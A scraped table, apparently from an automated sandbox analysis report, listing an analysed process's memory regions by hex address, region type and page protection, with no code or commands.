|
||
|
5AF4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
823E000
|
stack
|
page read and write
|
||
|
A7C000
|
stack
|
page read and write
|
||
|
5A407BE000
|
stack
|
page read and write
|
||
|
1F640C4D000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
1F642D27000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
1FD453D7000
|
trusted library allocation
|
page read and write
|
||
|
1F640D84000
|
heap
|
page read and write
|
||
|
1F640C45000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
5A403FE000
|
stack
|
page read and write
|
||
|
1FD4540B000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
4E23000
|
heap
|
page read and write
|
||
|
1FD42FB7000
|
heap
|
page read and write
|
||
|
22700000
|
heap
|
page read and write
|
||
|
C48000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
23819000
|
unclassified section
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page readonly
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1FD449F2000
|
trusted library allocation
|
page read and write
|
||
|
1FD44AA7000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
49E0000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
1F640DA0000
|
heap
|
page read and write
|
||
|
86DC000
|
stack
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page read and write
|
||
|
8870000
|
direct allocation
|
page read and write
|
||
|
1F640CF5000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
23026000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
A676000
|
direct allocation
|
page execute and read and write
|
||
|
2E4E000
|
unkown
|
page read and write
|
||
|
4A12000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
34AC000
|
heap
|
page read and write
|
||
|
7360000
|
heap
|
page read and write
|
||
|
308A000
|
heap
|
page read and write
|
||
|
2263E000
|
stack
|
page read and write
|
||
|
2700000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
7008000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
75A7000
|
trusted library allocation
|
page read and write
|
||
|
1F642D1C000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
6EB0000
|
direct allocation
|
page read and write
|
||
|
1FD5CF49000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
313B000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
5013000
|
heap
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
4961000
|
trusted library allocation
|
page read and write
|
||
|
1F640DBD000
|
heap
|
page read and write
|
||
|
1FD449A0000
|
trusted library allocation
|
page read and write
|
||
|
1F642D28000
|
heap
|
page read and write
|
||
|
239D000
|
stack
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
70AE000
|
heap
|
page read and write
|
||
|
226E0000
|
heap
|
page read and write
|
||
|
5005000
|
heap
|
page read and write
|
||
|
1F640D89000
|
heap
|
page read and write
|
||
|
70B6000
|
heap
|
page read and write
|
||
|
7099000
|
heap
|
page read and write
|
||
|
4A15000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
5A40ABE000
|
stack
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
3CA0000
|
remote allocation
|
page execute and read and write
|
||
|
1FD45070000
|
trusted library allocation
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
7350000
|
heap
|
page read and write
|
||
|
4796000
|
remote allocation
|
page execute and read and write
|
||
|
1F640D19000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page execute and read and write
|
||
|
22A4E000
|
stack
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
1F640D82000
|
heap
|
page read and write
|
||
|
23439000
|
heap
|
page read and write
|
||
|
1F640D19000
|
heap
|
page read and write
|
||
|
1F6429B6000
|
heap
|
page read and write
|
||
|
1FD5D230000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
1F640BE0000
|
heap
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
313A000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
5009000
|
heap
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
1F6429B6000
|
heap
|
page read and write
|
||
|
5A4158D000
|
stack
|
page read and write
|
||
|
76ED000
|
stack
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
49DF000
|
stack
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
1F640D0D000
|
heap
|
page read and write
|
||
|
4F5F000
|
stack
|
page read and write
|
||
|
27C2000
|
heap
|
page read and write
|
||
|
7043000
|
heap
|
page read and write
|
||
|
CFE000
|
heap
|
page read and write
|
||
|
2FCF000
|
stack
|
page read and write
|
||
|
500D000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
5196000
|
remote allocation
|
page execute and read and write
|
||
|
368F000
|
stack
|
page read and write
|
||
|
5A402FE000
|
stack
|
page read and write
|
||
|
1F642CF6000
|
heap
|
page read and write
|
||
|
313A000
|
heap
|
page read and write
|
||
|
229D0000
|
direct allocation
|
page read and write
|
||
|
1FD45E0B000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
There are 806 hidden memdumps, click here to show them.